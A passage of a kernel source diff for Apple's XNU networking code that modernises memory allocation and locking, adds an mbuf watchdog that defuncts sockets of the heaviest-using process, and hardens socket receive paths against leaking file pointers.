(mbuf_tx_compl_tbl_lck_grp_attr == NULL) { - panic("%s: lck_grp_attr_alloc_init failed", __func__); - /* NOTREACHED */ - } - mbuf_tx_compl_tbl_lck_grp = lck_grp_alloc_init("mbuf_tx_compl_tbl", - mbuf_tx_compl_tbl_lck_grp_attr); - if (mbuf_tx_compl_tbl_lck_grp == NULL) { - panic("%s: lck_grp_alloc_init failed", __func__); - /* NOTREACHED */ - } - mbuf_tx_compl_tbl_lck_attr = lck_attr_alloc_init(); - if (mbuf_tx_compl_tbl_lck_attr == NULL) { - panic("%s: lck_attr_alloc_init failed", __func__); - /* NOTREACHED */ - } - lck_rw_init(mbuf_tx_compl_tbl_lock, mbuf_tx_compl_tbl_lck_grp, - 
mbuf_tx_compl_tbl_lck_attr); } /* @@ -2995,6 +2962,30 @@ m_vm_error_stats(uint32_t *cnt, uint64_t *ts, uint64_t *size, } } +static vm_offset_t +kmem_mb_alloc(vm_map_t mbmap, int size, int physContig, kern_return_t *err) +{ + vm_offset_t addr = 0; + kern_return_t kr = KERN_SUCCESS; + + if (!physContig) { + kr = kernel_memory_allocate(mbmap, &addr, size, 0, + KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF); + } else { + kr = kmem_alloc_contig(mbmap, &addr, size, PAGE_MASK, 0xfffff, + 0, KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF); + } + + if (kr != KERN_SUCCESS) { + addr = 0; + } + if (err) { + *err = kr; + } + + return addr; +} + /* * Allocate some number of mbuf clusters and place on cluster freelist. */ @@ -6786,6 +6777,110 @@ mbuf_waiter_dec(mbuf_class_t class, boolean_t comp) } } +static bool mbuf_watchdog_defunct_active = false; + +static uint32_t +mbuf_watchdog_socket_space(struct socket *so) +{ + if (so == NULL) { + return 0; + } + + return so->so_snd.sb_mbcnt + so->so_rcv.sb_mbcnt; +} + +struct mbuf_watchdog_defunct_args { + struct proc *top_app; + uint32_t top_app_space_used; +}; + +static int +mbuf_watchdog_defunct_iterate(proc_t p, void *arg) +{ + struct fileproc *fp = NULL; + struct mbuf_watchdog_defunct_args *args = + (struct mbuf_watchdog_defunct_args *)arg; + uint32_t space_used = 0; + + proc_fdlock(p); + fdt_foreach(fp, p) { + struct fileglob *fg = fp->fp_glob; + struct socket *so = NULL; + + if (FILEGLOB_DTYPE(fg) != DTYPE_SOCKET) { + continue; + } + so = (struct socket *)fp->fp_glob->fg_data; + /* + * We calculate the space without the socket + * lock because we don't want to be blocked + * by another process that called send() and + * is stuck waiting for mbufs. + * + * These variables are 32-bit so we don't have + * to worry about incomplete reads. 
+ */ + space_used += mbuf_watchdog_socket_space(so); + } + proc_fdunlock(p); + if (space_used > args->top_app_space_used) { + if (args->top_app != NULL) { + proc_rele(args->top_app); + } + args->top_app = p; + args->top_app_space_used = space_used; + + return PROC_CLAIMED; + } else { + return PROC_RETURNED; + } +} + +extern char *proc_name_address(void *p); + +static void +mbuf_watchdog_defunct(thread_call_param_t arg0, thread_call_param_t arg1) +{ +#pragma unused(arg0, arg1) + struct mbuf_watchdog_defunct_args args = {}; + struct fileproc *fp = NULL; + + proc_iterate(PROC_ALLPROCLIST, + mbuf_watchdog_defunct_iterate, &args, NULL, NULL); + + /* + * Defunct all sockets from this app. + */ + if (args.top_app != NULL) { + os_log(OS_LOG_DEFAULT, "%s: defuncting all sockets from %s.%d", + __func__, + proc_name_address(args.top_app), + proc_pid(args.top_app)); + proc_fdlock(args.top_app); + fdt_foreach(fp, args.top_app) { + struct fileglob *fg = fp->fp_glob; + struct socket *so = NULL; + + if (FILEGLOB_DTYPE(fg) != DTYPE_SOCKET) { + continue; + } + so = (struct socket *)fp->fp_glob->fg_data; + socket_lock(so, 0); + if (sosetdefunct(args.top_app, so, + SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL, + TRUE) == 0) { + sodefunct(args.top_app, so, + SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL); + } + socket_unlock(so, 0); + } + proc_fdunlock(args.top_app); + proc_rele(args.top_app); + mbstat.m_forcedefunct++; + } + mbuf_watchdog_defunct_active = false; +} + /* * Called during slab (blocking and non-blocking) allocation. 
If there * is at least one waiter, and the time since the first waiter is blocked @@ -6796,13 +6891,43 @@ mbuf_watchdog(void) { struct timeval now; unsigned int since; + static thread_call_t defunct_tcall = NULL; if (mb_waiters == 0 || !mb_watchdog) { return; } + LCK_MTX_ASSERT(mbuf_mlock, LCK_MTX_ASSERT_OWNED); + microuptime(&now); since = now.tv_sec - mb_wdtstart.tv_sec; + + /* + * Check if we are about to panic the system due + * to lack of mbufs and start defuncting sockets + * from processes that use too many sockets. + * + * We're always called with the mbuf_mlock held, + * so that also protects mbuf_watchdog_defunct_active. + */ + if (since >= MB_WDT_MAXTIME / 2 && !mbuf_watchdog_defunct_active) { + /* + * Start a thread to defunct sockets + * from apps that are over-using their socket + * buffers. + */ + if (defunct_tcall == NULL) { + defunct_tcall = + thread_call_allocate_with_options(mbuf_watchdog_defunct, + NULL, + THREAD_CALL_PRIORITY_KERNEL, + THREAD_CALL_OPTIONS_ONCE); + } + if (defunct_tcall != NULL) { + mbuf_watchdog_defunct_active = true; + thread_call_enter(defunct_tcall); + } + } if (since >= MB_WDT_MAXTIME) { panic_plain("%s: %d waiters stuck for %u secs\n%s", __func__, mb_waiters, since, mbuf_dump()); @@ -7060,11 +7185,9 @@ slab_get(void *buf) lck_mtx_unlock(mbuf_mlock); /* This is a new buffer; create the slabs group for it */ - MALLOC(slg, mcl_slabg_t *, sizeof(*slg), M_TEMP, - M_WAITOK | M_ZERO); - MALLOC(slg->slg_slab, mcl_slab_t *, sizeof(mcl_slab_t) * NSLABSPMB, - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(slg != NULL && slg->slg_slab != NULL); + slg = zalloc_permanent_type(mcl_slabg_t); + slg->slg_slab = zalloc_permanent(sizeof(mcl_slab_t) * NSLABSPMB, + ZALIGN(mcl_slab_t)); lck_mtx_lock(mbuf_mlock); /* @@ -7471,13 +7594,25 @@ __abortlike static void mcl_audit_mcheck_panic(struct mbuf *m) { + char buf[DUMP_MCA_BUF_SIZE]; mcache_audit_t *mca; MRANGE(m); mca = mcl_audit_buf2mca(MC_MBUF, (mcache_obj_t *)m); panic("mcl_audit: freed mbuf %p with 
type 0x%x (instead of 0x%x)\n%s\n", - m, (u_int16_t)m->m_type, MT_FREE, mcache_dump_mca(mca)); + m, (u_int16_t)m->m_type, MT_FREE, mcache_dump_mca(buf, mca)); + /* NOTREACHED */ +} + +__abortlike +static void +mcl_audit_verify_nextptr_panic(void *next, mcache_audit_t *mca) +{ + char buf[DUMP_MCA_BUF_SIZE]; + panic("mcl_audit: buffer %p modified after free at offset 0: " + "%p out of range [%p-%p)\n%s\n", + mca->mca_addr, next, mbutl, embutl, mcache_dump_mca(buf, mca)); /* NOTREACHED */ } @@ -7486,10 +7621,7 @@ mcl_audit_verify_nextptr(void *next, mcache_audit_t *mca) { if (next != NULL && !MBUF_IN_MAP(next) && (next != (void *)MCACHE_FREE_PATTERN || !mclverify)) { - panic("mcl_audit: buffer %p modified after free at offset 0: " - "%p out of range [%p-%p)\n%s\n", - mca->mca_addr, next, mbutl, embutl, mcache_dump_mca(mca)); - /* NOTREACHED */ + mcl_audit_verify_nextptr_panic(next, mca); } } @@ -7514,17 +7646,11 @@ mleak_activate(void) mleak_alloc_buckets * sizeof(struct mallocation); vm_size_t trace_size = mleak_trace_buckets * sizeof(struct mtrace); - MALLOC(mleak_allocations, struct mallocation *, alloc_size, - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(mleak_allocations != NULL); + mleak_allocations = zalloc_permanent(alloc_size, ZALIGN(struct mallocation)); + mleak_traces = zalloc_permanent(trace_size, ZALIGN(struct mtrace)); + mleak_stat = zalloc_permanent(MLEAK_STAT_SIZE(MLEAK_NUM_TRACES), + ZALIGN(mleak_stat_t)); - MALLOC(mleak_traces, struct mtrace *, trace_size, - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(mleak_traces != NULL); - - MALLOC(mleak_stat, mleak_stat_t *, MLEAK_STAT_SIZE(MLEAK_NUM_TRACES), - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(mleak_stat != NULL); mleak_stat->ml_cnt = MLEAK_NUM_TRACES; #ifdef __LP64__ mleak_stat->ml_isaddr64 = 1; @@ -8689,11 +8815,12 @@ _mbwdog_logger(const char *func, const int line, const char *fmt, ...) 
LCK_MTX_ASSERT(mbuf_mlock, LCK_MTX_ASSERT_OWNED); if (mbwdog_logging == NULL) { - mbwdog_logging = _MALLOC(mbwdog_logging_size, - M_TEMP, M_ZERO | M_NOWAIT); - if (mbwdog_logging == NULL) { - return; - } + /* + * This might block under a mutex, which isn't really great, + * but this happens once, so we'll live. + */ + mbwdog_logging = zalloc_permanent(mbwdog_logging_size, + ZALIGN_NONE); } va_start(ap, fmt); vsnprintf(p, sizeof(p), fmt, ap); @@ -8729,80 +8856,6 @@ SYSCTL_PROC(_kern_ipc, OID_AUTO, mbwdog_log, CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_LOCKED, 0, 0, sysctl_mbwdog_log, "A", ""); -static int mbtest_val; -static int mbtest_running; - -static void -mbtest_thread(__unused void *arg) -{ - int i; - int scale_down = 1; - int iterations = 250; - int allocations = nmbclusters; - iterations = iterations / scale_down; - allocations = allocations / scale_down; - printf("%s thread starting\n", __func__); - for (i = 0; i < iterations; i++) { - unsigned int needed = allocations; - struct mbuf *m1, *m2, *m3; - - if (njcl > 0) { - needed = allocations; - m3 = m_getpackets_internal(&needed, 0, M_DONTWAIT, 0, M16KCLBYTES); - m_freem_list(m3); - } - - needed = allocations; - m2 = m_getpackets_internal(&needed, 0, M_DONTWAIT, 0, MBIGCLBYTES); - m_freem_list(m2); - - m1 = m_getpackets_internal(&needed, 0, M_DONTWAIT, 0, MCLBYTES); - m_freem_list(m1); - } - - printf("%s thread ending\n", __func__); - - OSDecrementAtomic(&mbtest_running); - wakeup_one((caddr_t)&mbtest_running); -} - -static void -sysctl_mbtest(void) -{ - /* We launch three threads - wait for all of them */ - OSIncrementAtomic(&mbtest_running); - OSIncrementAtomic(&mbtest_running); - OSIncrementAtomic(&mbtest_running); - - thread_call_func_delayed((thread_call_func_t)mbtest_thread, NULL, 10); - thread_call_func_delayed((thread_call_func_t)mbtest_thread, NULL, 10); - thread_call_func_delayed((thread_call_func_t)mbtest_thread, NULL, 10); - - while (mbtest_running) { - msleep((caddr_t)&mbtest_running, NULL, PUSER, 
"mbtest_running", NULL); - } -} - -static int -mbtest SYSCTL_HANDLER_ARGS -{ -#pragma unused(arg1, arg2) - int error = 0, val, oldval = mbtest_val; - - val = oldval; - error = sysctl_handle_int(oidp, &val, 0, req); - if (error || !req->newptr) { - return error; - } - - if (val != oldval) { - sysctl_mbtest(); - } - - mbtest_val = val; - - return error; -} #endif // DEBUG || DEVELOPMENT static void @@ -8835,9 +8888,6 @@ mtracelarge_register(size_t size) SYSCTL_DECL(_kern_ipc); #if DEBUG || DEVELOPMENT -SYSCTL_PROC(_kern_ipc, OID_AUTO, mbtest, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_LOCKED, &mbtest_val, 0, &mbtest, "I", - "Toggle to test mbufs"); #endif SYSCTL_PROC(_kern_ipc, KIPC_MBSTAT, mbstat, CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_LOCKED, diff --git a/bsd/kern/uipc_socket.c b/bsd/kern/uipc_socket.c index e1a5241a2..cc13d328c 100644 --- a/bsd/kern/uipc_socket.c +++ b/bsd/kern/uipc_socket.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 1998-2020 Apple Inc. All rights reserved. + * Copyright (c) 1998-2021 Apple Inc. All rights reserved. 
* * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -153,10 +153,8 @@ static u_int32_t so_cache_time; static int socketinit_done; static struct zone *so_cache_zone; -static lck_grp_t *so_cache_mtx_grp; -static lck_attr_t *so_cache_mtx_attr; -static lck_grp_attr_t *so_cache_mtx_grp_attr; -static lck_mtx_t *so_cache_mtx; +static LCK_GRP_DECLARE(so_cache_mtx_grp, "so_cache"); +static LCK_MTX_DECLARE(so_cache_mtx, &so_cache_mtx_grp); #include @@ -410,24 +408,6 @@ socketinit(void) PE_parse_boot_argn("socket_debug", &socket_debug, sizeof(socket_debug)); - /* - * allocate lock group attribute and group for socket cache mutex - */ - so_cache_mtx_grp_attr = lck_grp_attr_alloc_init(); - so_cache_mtx_grp = lck_grp_alloc_init("so_cache", - so_cache_mtx_grp_attr); - - /* - * allocate the lock attribute for socket cache mutex - */ - so_cache_mtx_attr = lck_attr_alloc_init(); - - /* cached sockets mutex */ - so_cache_mtx = lck_mtx_alloc_init(so_cache_mtx_grp, so_cache_mtx_attr); - if (so_cache_mtx == NULL) { - panic("%s: unable to allocate so_cache_mtx\n", __func__); - /* NOTREACHED */ - } STAILQ_INIT(&so_cache_head); so_cache_zone_element_size = (vm_size_t)(sizeof(struct socket) + 4 @@ -442,7 +422,6 @@ socketinit(void) soextbkidlestat.so_xbkidle_rcvhiwat = SO_IDLE_BK_IDLE_RCV_HIWAT; in_pcbinit(); - sflt_init(); socket_tclass_init(); #if MULTIPATH mp_pcbinit(); @@ -455,7 +434,7 @@ cached_sock_alloc(struct socket **so, zalloc_flags_t how) caddr_t temp; uintptr_t offset; - lck_mtx_lock(so_cache_mtx); + lck_mtx_lock(&so_cache_mtx); if (!STAILQ_EMPTY(&so_cache_head)) { VERIFY(cached_sock_count > 0); @@ -465,14 +444,14 @@ cached_sock_alloc(struct socket **so, zalloc_flags_t how) STAILQ_NEXT((*so), so_cache_ent) = NULL; cached_sock_count--; - lck_mtx_unlock(so_cache_mtx); + lck_mtx_unlock(&so_cache_mtx); temp = (*so)->so_saved_pcb; bzero((caddr_t)*so, sizeof(struct socket)); (*so)->so_saved_pcb = temp; } else { - lck_mtx_unlock(so_cache_mtx); + lck_mtx_unlock(&so_cache_mtx); *so = 
zalloc_flags(so_cache_zone, how | Z_ZERO); @@ -502,12 +481,12 @@ cached_sock_alloc(struct socket **so, zalloc_flags_t how) static void cached_sock_free(struct socket *so) { - lck_mtx_lock(so_cache_mtx); + lck_mtx_lock(&so_cache_mtx); so_cache_time = net_uptime(); if (++cached_sock_count > max_cached_sock_count) { --cached_sock_count; - lck_mtx_unlock(so_cache_mtx); + lck_mtx_unlock(&so_cache_mtx); zfree(so_cache_zone, so); } else { if (so_cache_hw < cached_sock_count) { @@ -517,7 +496,7 @@ cached_sock_free(struct socket *so) STAILQ_INSERT_TAIL(&so_cache_head, so, so_cache_ent); so->cache_timestamp = so_cache_time; - lck_mtx_unlock(so_cache_mtx); + lck_mtx_unlock(&so_cache_mtx); } } @@ -574,7 +553,7 @@ so_cache_timer(void) int n_freed = 0; boolean_t rc = FALSE; - lck_mtx_lock(so_cache_mtx); + lck_mtx_lock(&so_cache_mtx); so_cache_timeouts++; so_cache_time = net_uptime(); @@ -602,7 +581,7 @@ so_cache_timer(void) rc = TRUE; } - lck_mtx_unlock(so_cache_mtx); + lck_mtx_unlock(&so_cache_mtx); return rc; } @@ -2510,9 +2489,7 @@ sosend(struct socket *so, struct sockaddr *addr, struct uio *uio, if (error) { if (error == EJUSTRETURN) { error = 0; - clen = 0; - control = NULL; - top = NULL; + goto packet_consumed; } goto out_locked; } @@ -3055,6 +3032,20 @@ done: return error; } +/* + * When peeking SCM_RIGHTS, the actual file descriptors are not yet created + * so clear the data portion in order not to leak the file pointers + */ +static void +sopeek_scm_rights(struct mbuf *rights) +{ + struct cmsghdr *cm = mtod(rights, struct cmsghdr *); + + if (cm->cmsg_type == SCM_RIGHTS) { + memset(cm + 1, 0, cm->cmsg_len - sizeof(*cm)); + } +} + /* * Process one or more MT_CONTROL mbufs present before any data mbufs * in the first mbuf chain on the socket buffer. 
If MSG_PEEK, we @@ -3103,6 +3094,9 @@ soreceive_ctl(struct socket *so, struct mbuf **controlp, int flags, error = ENOBUFS; goto done; } + + sopeek_scm_rights(*controlp); + controlp = &(*controlp)->m_next; } m = m->m_next; @@ -3681,6 +3675,11 @@ dontblock: } else if (type == MT_OOBDATA) { break; } + + if (m->m_type != MT_OOBDATA && m->m_type != MT_DATA && + m->m_type != MT_HEADER) { + break; + } /* * Make sure to allways set MSG_OOB event when getting * out of band data inline. @@ -8009,10 +8008,6 @@ socket_post_kev_msg_closed(struct socket *so) &ev.ev_data, sizeof(ev)); } } - if (socksa != NULL) { - FREE(socksa, M_SONAME); - } - if (peersa != NULL) { - FREE(peersa, M_SONAME); - } + FREE(socksa, M_SONAME); + FREE(peersa, M_SONAME); } diff --git a/bsd/kern/uipc_syscalls.c b/bsd/kern/uipc_syscalls.c index e82721676..45e0f674e 100644 --- a/bsd/kern/uipc_syscalls.c +++ b/bsd/kern/uipc_syscalls.c @@ -166,8 +166,8 @@ static boolean_t uio_array_is_valid(struct uio **, u_int); static int recv_msg_array_is_valid(struct recv_msg_elem *, u_int); static int internalize_recv_msghdr_array(const void *, int, int, u_int, struct user_msghdr_x *, struct recv_msg_elem *); -static u_int externalize_recv_msghdr_array(void *, int, int, u_int, - const struct user_msghdr_x *, struct recv_msg_elem *); +static u_int externalize_recv_msghdr_array(struct proc *, struct socket *, void *, u_int, + struct user_msghdr_x *, struct recv_msg_elem *, int *); static struct recv_msg_elem *alloc_recv_msg_array(u_int count); static void free_recv_msg_array(struct recv_msg_elem *, u_int); @@ -1307,7 +1307,7 @@ sendit(struct proc *p, struct socket *so, struct user_msghdr *mp, uio_t uiop, *retval = (int)(len - uio_resid(uiop)); } bad: - if (to != NULL && want_free) { + if (want_free) { FREE(to, M_SONAME); } out: @@ -1540,6 +1540,9 @@ sendmsg_x(struct proc *p, struct sendmsg_x_args *uap, user_ssize_t *retval) KERNEL_DEBUG(DBG_FNC_SENDMSG_X | DBG_FUNC_START, 0, 0, 0, 0, 0); + size_of_msghdr = 
IS_64BIT_PROCESS(p) ? + sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x); + if (uap->flags & MSG_SKIPCFIL) { error = EPERM; goto out; @@ -1569,28 +1572,25 @@ sendmsg_x(struct proc *p, struct sendmsg_x_args *uap, user_ssize_t *retval) uap->cnt = somaxsendmsgx; } - user_msg_x = _MALLOC(uap->cnt * sizeof(struct user_msghdr_x), - M_TEMP, M_WAITOK | M_ZERO); + user_msg_x = kheap_alloc(KHEAP_TEMP, + uap->cnt * sizeof(struct user_msghdr_x), Z_WAITOK | Z_ZERO); if (user_msg_x == NULL) { - DBG_PRINTF("%s _MALLOC() user_msg_x failed\n", __func__); + DBG_PRINTF("%s kheap_alloc user_msg_x failed\n", __func__); error = ENOMEM; goto out; } - uiop = _MALLOC(uap->cnt * sizeof(struct uio *), - M_TEMP, M_WAITOK | M_ZERO); + uiop = kheap_alloc(KHEAP_TEMP, + uap->cnt * sizeof(struct uio *), Z_WAITOK | Z_ZERO); if (uiop == NULL) { - DBG_PRINTF("%s _MALLOC() uiop failed\n", __func__); + DBG_PRINTF("%s kheap_alloc uiop failed\n", __func__); error = ENOMEM; goto out; } - size_of_msghdr = IS_64BIT_PROCESS(p) ? 
- sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x); - - umsgp = _MALLOC(uap->cnt * size_of_msghdr, - M_TEMP, M_WAITOK | M_ZERO); + umsgp = kheap_alloc(KHEAP_TEMP, + uap->cnt * size_of_msghdr, Z_WAITOK | Z_ZERO); if (umsgp == NULL) { - printf("%s _MALLOC() user_msg_x failed\n", __func__); + printf("%s kheap_alloc user_msg_x failed\n", __func__); error = ENOMEM; goto out; } @@ -1720,16 +1720,14 @@ out: if (need_drop) { file_drop(uap->s); } - if (umsgp != NULL) { - _FREE(umsgp, M_TEMP); - } + kheap_free(KHEAP_TEMP, umsgp, uap->cnt * size_of_msghdr); if (uiop != NULL) { free_uio_array(uiop, uap->cnt); - _FREE(uiop, M_TEMP); - } - if (user_msg_x != NULL) { - _FREE(user_msg_x, M_TEMP); + kheap_free(KHEAP_TEMP, uiop, + uap->cnt * sizeof(struct uio *)); } + kheap_free(KHEAP_TEMP, user_msg_x, + uap->cnt * sizeof(struct user_msghdr_x)); KERNEL_DEBUG(DBG_FNC_SENDMSG_X | DBG_FUNC_END, error, 0, 0, 0, 0); @@ -1965,9 +1963,7 @@ recvit(struct proc *p, int s, struct user_msghdr *mp, uio_t uiop, &mp->msg_controllen, &mp->msg_flags, so); } out: - if (fromsa) { - FREE(fromsa, M_SONAME); - } + FREE(fromsa, M_SONAME); if (control) { m_freem(control); } @@ -2199,6 +2195,9 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) KERNEL_DEBUG(DBG_FNC_RECVMSG_X | DBG_FUNC_START, 0, 0, 0, 0, 0); + size_of_msghdr = IS_64BIT_PROCESS(p) ? 
+ sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x); + error = file_socket(uap->s, &so); if (error) { goto out; @@ -2208,6 +2207,12 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) error = EBADF; goto out; } + /* + * Support only a subset of message flags + */ + if (uap->flags & ~(MSG_PEEK | MSG_WAITALL | MSG_DONTWAIT | MSG_NEEDSA | MSG_NBIO)) { + return EOPNOTSUPP; + } /* * Input parameter range check */ @@ -2219,10 +2224,10 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) uap->cnt = somaxrecvmsgx; } - user_msg_x = _MALLOC(uap->cnt * sizeof(struct user_msghdr_x), - M_TEMP, M_WAITOK | M_ZERO); + user_msg_x = kheap_alloc(KHEAP_TEMP, + uap->cnt * sizeof(struct user_msghdr_x), Z_WAITOK | Z_ZERO); if (user_msg_x == NULL) { - DBG_PRINTF("%s _MALLOC() user_msg_x failed\n", __func__); + DBG_PRINTF("%s kheap_alloc user_msg_x failed\n", __func__); error = ENOMEM; goto out; } @@ -2232,12 +2237,11 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) error = ENOMEM; goto out; } - size_of_msghdr = IS_64BIT_PROCESS(p) ? 
- sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x); - umsgp = _MALLOC(uap->cnt * size_of_msghdr, M_TEMP, M_WAITOK | M_ZERO); + umsgp = kheap_alloc(KHEAP_TEMP, + uap->cnt * size_of_msghdr, Z_WAITOK | Z_ZERO); if (umsgp == NULL) { - DBG_PRINTF("%s _MALLOC() umsgp failed\n", __func__); + DBG_PRINTF("%s kheap_alloc umsgp failed\n", __func__); error = ENOMEM; goto out; } @@ -2318,7 +2322,7 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) &recv_msg_elem->controlp : NULL; error = so->so_proto->pr_usrreqs->pru_soreceive(so, psa, - auio, (struct mbuf **)0, controlp, &flags); + auio, (struct mbuf **)NULL, controlp, &flags); if (error) { break; } @@ -2326,17 +2330,18 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) * We have some data */ recv_msg_elem->which |= SOCK_MSG_DATA; + /* + * Set the messages flags for this packet + */ + flags &= ~MSG_DONTWAIT; + recv_msg_elem->flags = flags; /* * Stop on partial copy */ - if (flags & (MSG_RCVMORE | MSG_TRUNC)) { + if (recv_msg_elem->flags & (MSG_RCVMORE | MSG_TRUNC)) { break; } } - if ((uap->flags & MSG_DONTWAIT) == 0) { - flags &= ~MSG_DONTWAIT; - } - uap->flags = flags; } len_after = recv_msg_array_resid(recv_msg_array, uap->cnt); @@ -2350,9 +2355,11 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) } } - uiocnt = externalize_recv_msghdr_array(umsgp, - IS_64BIT_PROCESS(p) ? 
UIO_USERSPACE64 : UIO_USERSPACE32, - UIO_READ, uap->cnt, user_msg_x, recv_msg_array); + uiocnt = externalize_recv_msghdr_array(p, so, umsgp, + uap->cnt, user_msg_x, recv_msg_array, &error); + if (error != 0) { + goto out; + } error = copyout(umsgp, uap->msgp, uap->cnt * size_of_msghdr); if (error) { @@ -2361,40 +2368,14 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) } *retval = (int)(uiocnt); - for (i = 0; i < uap->cnt; i++) { - struct user_msghdr_x *mp = user_msg_x + i; - struct recv_msg_elem *recv_msg_elem = recv_msg_array + i; - struct sockaddr *fromsa = recv_msg_elem->psa; - - if (mp->msg_name) { - error = copyout_sa(fromsa, mp->msg_name, - &mp->msg_namelen); - if (error) { - goto out; - } - } - if (mp->msg_control) { - error = copyout_control(p, recv_msg_elem->controlp, - mp->msg_control, &mp->msg_controllen, - &mp->msg_flags, so); - if (error) { - goto out; - } - } - } out: if (need_drop) { file_drop(uap->s); } - if (umsgp != NULL) { - _FREE(umsgp, M_TEMP); - } - if (recv_msg_array != NULL) { - free_recv_msg_array(recv_msg_array, uap->cnt); - } - if (user_msg_x != NULL) { - _FREE(user_msg_x, M_TEMP); - } + kheap_free(KHEAP_TEMP, umsgp, uap->cnt * size_of_msghdr); + free_recv_msg_array(recv_msg_array, uap->cnt); + kheap_free(KHEAP_TEMP, user_msg_x, + uap->cnt * sizeof(struct user_msghdr_x)); KERNEL_DEBUG(DBG_FNC_RECVMSG_X | DBG_FUNC_END, error, 0, 0, 0, 0); @@ -2633,9 +2614,7 @@ getsockname(__unused struct proc *p, struct getsockname_args *uap, gotnothing: error = copyout((caddr_t)&len, uap->alen, sizeof(socklen_t)); bad: - if (sa) { - FREE(sa, M_SONAME); - } + FREE(sa, M_SONAME); out: file_drop(uap->fdes); return error; @@ -2722,9 +2701,7 @@ getpeername(__unused struct proc *p, struct getpeername_args *uap, gotnothing: error = copyout((caddr_t)&len, uap->alen, sizeof(socklen_t)); bad: - if (sa) { - FREE(sa, M_SONAME); - } + FREE(sa, M_SONAME); out: file_drop(uap->fdes); return error; @@ -3092,48 +3069,60 @@ 
externalize_user_msghdr_array(void *dst, int spacetype, int direction, } u_int -externalize_recv_msghdr_array(void *dst, int spacetype, int direction, - u_int count, const struct user_msghdr_x *src, - struct recv_msg_elem *recv_msg_array) +externalize_recv_msghdr_array(struct proc *p, struct socket *so, void *dst, + u_int count, struct user_msghdr_x *src, + struct recv_msg_elem *recv_msg_array, int *ret_error) { u_int i; - int seenlast = 0; u_int retcnt = 0; + int spacetype = IS_64BIT_PROCESS(p) ? UIO_USERSPACE64 : UIO_USERSPACE32; + + *ret_error = 0; for (i = 0; i < count; i++) { - const struct user_msghdr_x *user_msg = src + i; + struct user_msghdr_x *user_msg = src + i; struct recv_msg_elem *recv_msg_elem = recv_msg_array + i; - user_ssize_t len; + user_ssize_t len = 0; + int error; len = user_msg->msg_datalen - uio_resid(recv_msg_elem->uio); - if (direction == UIO_READ) { - if ((recv_msg_elem->which & SOCK_MSG_DATA) == 0) { - seenlast = 1; + if ((recv_msg_elem->which & SOCK_MSG_DATA)) { + retcnt++; + + + if (recv_msg_elem->which & SOCK_MSG_SA) { + error = copyout_sa(recv_msg_elem->psa, user_msg->msg_name, + &user_msg->msg_namelen); + if (error != 0) { + *ret_error = error; + return 0; + } } - } else { - if (user_msg->msg_datalen != 0 && len == 0) { - seenlast = 1; + if (recv_msg_elem->which & SOCK_MSG_CONTROL) { + error = copyout_control(p, recv_msg_elem->controlp, + user_msg->msg_control, &user_msg->msg_controllen, + &recv_msg_elem->flags, so); + if (error != 0) { + *ret_error = error; + return 0; + } } } - if (seenlast == 0) { - retcnt++; - } - if (spacetype == UIO_USERSPACE64) { - struct user64_msghdr_x *msghdr64; - - msghdr64 = ((struct user64_msghdr_x *)dst) + i; + struct user64_msghdr_x *msghdr64 = ((struct user64_msghdr_x *)dst) + i; - msghdr64->msg_flags = user_msg->msg_flags; + msghdr64->msg_namelen = user_msg->msg_namelen; + msghdr64->msg_controllen = user_msg->msg_controllen; + msghdr64->msg_flags = recv_msg_elem->flags; msghdr64->msg_datalen = len; 
} else { - struct user32_msghdr_x *msghdr32; - - msghdr32 = ((struct user32_msghdr_x *)dst) + i; + struct user32_msghdr_x *msghdr32 = ((struct user32_msghdr_x *)dst) + i; - msghdr32->msg_flags = user_msg->msg_flags; + msghdr32->msg_namelen = user_msg->msg_namelen; + msghdr32->msg_controllen = user_msg->msg_controllen; + msghdr32->msg_flags = recv_msg_elem->flags; msghdr32->msg_datalen = (user32_size_t)len; } } @@ -3201,33 +3190,29 @@ uio_array_is_valid(struct uio **uiop, u_int count) struct recv_msg_elem * alloc_recv_msg_array(u_int count) { - struct recv_msg_elem *recv_msg_array; - - recv_msg_array = _MALLOC(count * sizeof(struct recv_msg_elem), - M_TEMP, M_WAITOK | M_ZERO); - - return recv_msg_array; + return kheap_alloc(KHEAP_TEMP, + count * sizeof(struct recv_msg_elem), Z_WAITOK | Z_ZERO); } void free_recv_msg_array(struct recv_msg_elem *recv_msg_array, u_int count) { - u_int i; - - for (i = 0; i < count; i++) { + if (recv_msg_array == NULL) { + return; + } + for (uint32_t i = 0; i < count; i++) { struct recv_msg_elem *recv_msg_elem = recv_msg_array + i; if (recv_msg_elem->uio != NULL) { uio_free(recv_msg_elem->uio); } - if (recv_msg_elem->psa != NULL) { - _FREE(recv_msg_elem->psa, M_TEMP); - } + _FREE(recv_msg_elem->psa, M_TEMP); if (recv_msg_elem->controlp != NULL) { m_freem(recv_msg_elem->controlp); } } - _FREE(recv_msg_array, M_TEMP); + kheap_free(KHEAP_TEMP, recv_msg_array, + count * sizeof(struct recv_msg_elem)); } diff --git a/bsd/kern/uipc_usrreq.c b/bsd/kern/uipc_usrreq.c index c363f4cf3..5e45f89ee 100644 --- 